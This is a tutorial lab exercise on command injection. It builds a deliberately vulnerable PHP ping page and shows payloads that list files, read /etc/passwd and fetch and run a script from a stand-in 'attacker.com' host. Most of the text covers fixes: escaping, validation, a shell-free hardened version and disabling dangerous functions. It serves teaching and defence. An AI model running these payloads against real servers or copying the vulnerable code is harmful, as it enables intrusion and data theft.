Exercise 11: Command Injection

Jan 21, 2025

Objective

Learn how to exploit Command Injection vulnerabilities to execute arbitrary system commands through a web application and understand how to prevent such attacks using secure coding practices.

Scenario

You are performing a security assessment on a web application that allows users to check if a specific server is reachable via the ping command. Due to improper input validation, the application is vulnerable to Command Injection, allowing attackers to execute arbitrary system commands on the server.


Lab Setup

Prerequisites:

  • Basic knowledge of PHP, Linux commands, and web security.
  • XAMPP/LAMP/WAMP stack installed (or any web server with PHP support).
  • A code editor (e.g., VSCode, Sublime Text).

Step 1: Create the Vulnerable Web Application

PHP Script for the Ping Functionality

Create a file ping.php:

<?php
// Deliberately vulnerable: the raw query parameter is concatenated into a
// command string that shell_exec() hands to /bin/sh, so shell metacharacters
// in $host (; | && $( ) ...) are interpreted by the shell.
if (isset($_GET['host'])) {
    $host = $_GET['host'];
    $output = shell_exec("ping -c 2 " . $host);
    echo "<pre>$output</pre>";
}
?>

<form method="GET" action="">
    Hostname/IP: <input type="text" name="host" required>
    <button type="submit">Ping</button>
</form>

Running the Application

  • Start the Apache server.
  • Place ping.php in the web server’s root directory (htdocs for XAMPP).
  • Open http://localhost/ping.php in your browser.

Exploitation Steps

Step 1: Testing for Command Injection

Enter a valid hostname in the input field:

127.0.0.1

Inject a command using ; or |:

127.0.0.1; ls 

or

127.0.0.1 | whoami

Expected Result:

  • The output of the ls or whoami command is displayed, confirming arbitrary command execution.

Step 2: Advanced Exploitation

Retrieve sensitive files:

127.0.0.1; cat /etc/passwd

Download and execute a malicious script (if outbound traffic is allowed):

127.0.0.1; wget http://attacker.com/shell.sh | bash

Solution and Prevention

Problem Analysis

  • User input is directly passed into the shell_exec function without validation or sanitization.

Fixing the Vulnerability

Use Escaping Functions

Escape shell arguments to prevent injections:

// escapeshellarg() wraps the value in single quotes and escapes any embedded
// single quote, so the shell treats the whole value as one literal argument.
$host = escapeshellarg($_GET['host']);
$output = shell_exec("ping -c 2 $host");

Validate User Input

Allow only valid hostnames/IP addresses:

// Allow-list: letters, digits, dots and hyphens only. The first character is
// restricted to a letter or digit so a value such as "-f" cannot be passed to
// ping as an option (escapeshellarg() protects against shell injection, not
// against argument injection).
if (preg_match('/^[a-zA-Z0-9][a-zA-Z0-9.\-]*$/', $_GET['host'])) {
    $host = escapeshellarg($_GET['host']);
    $output = shell_exec("ping -c 2 $host");
    echo "<pre>$output</pre>";
} else {
    echo "<h2>Invalid input detected.</h2>";
}

Use Safer Alternatives to shell_exec

Replace shell_exec with safer functions or APIs.

// Note: system() still runs the command through the shell, so it is only as
// safe as the escaping applied to its arguments; escapeshellarg() is what
// prevents injection here. system() also prints the output directly and
// returns just the last line, so it does not need a separate echo.
$output = system("ping -c 2 " . escapeshellarg($_GET['host']));
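The three fixes above (validation, escaping, and a safer API) can be combined into one hardened replacement for ping.php. The following is an added example, not code from the original exercise; it goes slightly beyond the text by avoiding the shell entirely with the array form of proc_open (available since PHP 7.4), by validating IPv6 literals with filter_var, and by HTML-escaping ping's output before reflecting it. It assumes a Linux iputils ping that accepts -c and -W.

```php
<?php
// Added example (not from the original exercise): a hardened replacement for ping.php.
// It combines strict validation, no shell at all (proc_open with an argv array,
// PHP >= 7.4), and output escaping. Assumes Linux iputils ping with -c/-W.

declare(strict_types=1);

/**
 * Return the host if it is a syntactically valid IPv4/IPv6 address or hostname,
 * otherwise null. Anything that could act as a shell metacharacter or as a
 * ping option (leading "-") is rejected here, before it reaches any process.
 */
function validate_host(string $host): ?string
{
    $host = trim($host);
    if ($host === '' || strlen($host) > 253) {
        return null;
    }
    // Literal IPv4/IPv6 addresses are accepted as-is.
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        return $host;
    }
    // Hostname: dot-separated labels of letters, digits and hyphens,
    // no label starting or ending with a hyphen (RFC 1123 syntax).
    $label = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    if (preg_match('/^' . $label . '(?:\.' . $label . ')*\.?$/', $host) === 1) {
        return $host;
    }
    return null;
}

/**
 * Run ping without a shell. The argv array is passed straight to process
 * creation, so characters like ";", "|" or "$(" have no special meaning.
 * Returns [exit_code, stdout]; callers must validate the host first.
 */
function ping_host(string $host, int $count = 2): array
{
    $cmd  = ['ping', '-c', (string) $count, '-W', '2', $host];
    $spec = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open($cmd, $spec, $pipes);
    if (!is_resource($proc)) {
        return [-1, 'could not start ping'];
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    $code = proc_close($proc);
    return [$code, $out];
}

// Request handler.
if (isset($_GET['host'])) {
    $host = validate_host((string) $_GET['host']);
    if ($host === null) {
        http_response_code(400);
        echo '<h2>Invalid hostname or IP address.</h2>';
    } else {
        [$code, $out] = ping_host($host);
        // ping echoes the hostname back, so its output must not be reflected
        // as raw HTML (that would turn the form into a reflected-XSS sink).
        echo '<pre>' . htmlspecialchars($out, ENT_QUOTES, 'UTF-8') . '</pre>';
    }
}

// Self-check of the validator against the payloads used in the exercise.
// Run with `php ping.php` from the command line (no $_GET there, so only
// this block executes). Expected: every line prints OK.
if (PHP_SAPI === 'cli') {
    $cases = [
        '127.0.0.1'          => true,
        'example.com'        => true,
        '::1'                => true,
        '127.0.0.1; ls'      => false,
        '127.0.0.1 | whoami' => false,
        '-f'                 => false,   // would be parsed as a ping option
        '$(id)'              => false,
    ];
    foreach ($cases as $input => $shouldPass) {
        $ok = (validate_host($input) !== null) === $shouldPass;
        printf("%-22s %s\n", var_export($input, true), $ok ? 'OK' : 'FAIL');
    }
}
```

Because the argument list never passes through /bin/sh, escapeshellarg() is no longer needed; validation remains in place because a value that is not a hostname has no business reaching ping at all, and because it closes the argument-injection gap (a host beginning with "-") that escaping alone does not.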

Run Applications with Least Privilege

Ensure the web server runs with limited permissions to minimize damage from successful attacks.

Disable Dangerous PHP Functions

Disable functions like exec(), shell_exec(), and system() in php.ini. Note that this lab's ping.php depends on shell_exec(), so on a server that genuinely needs to run a command the feature must be rewritten to use an allowed API before these functions are disabled:

disable_functions = exec, shell_exec, system, passthru, popen

Testing After Fix

Attempt to inject commands after implementing input validation:

127.0.0.1; ls

Expected Result:

The application blocks the command and only allows valid hostnames.


Conclusion

In this lab, you exploited a Command Injection vulnerability by injecting arbitrary system commands through user input. You also learned how to secure applications using input validation, escaping functions, and secure server configurations to prevent such vulnerabilities.
